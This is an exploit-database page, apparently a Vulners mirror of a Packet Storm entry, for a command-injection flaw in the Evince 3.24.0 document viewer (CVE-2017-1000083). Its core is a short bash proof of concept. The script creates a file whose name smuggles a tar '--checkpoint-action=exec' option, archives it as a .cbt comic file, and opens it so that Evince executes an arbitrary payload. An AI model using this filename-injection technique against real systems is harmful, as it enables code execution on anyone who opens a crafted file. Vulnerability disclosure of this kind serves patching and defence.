Lucene search
K

Evince 3.24.0 Command Injection

🗓️ 13 Nov 2018 00:00:00Reported by MatlinkType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 167 Views

Evince 3.24.0 Command Injection CVE-2017-100008

Related
Code
`# Exploit Title: evince command line injection  
# Date: 2017-09-05  
# Exploit Author: Matlink  
# Vendor Homepage: https://wiki.gnome.org/Apps/Evince  
# Software Link: https://wiki.gnome.org/Apps/Evince  
# Version: 3.24.0  
# Tested on: Debian sid  
# CVE : CVE-2017-1000083  
  
Can be tested on docker with https://github.com/matlink/evince-cve-2017-1000083  
  
#! /bin/bash  
  
# define the payload  
export PAYLOAD="firefox google.com"  
  
# Create the malicious .cbt file  
dd if=/dev/zero of=" --checkpoint-action=exec=bash -c '$PAYLOAD;'.jpg" bs=1 count=512000  
tar cvf poc.cbt *.jpg  
  
# Run the malicious file  
evince poc.cbt  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Nov 2018 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.76136
167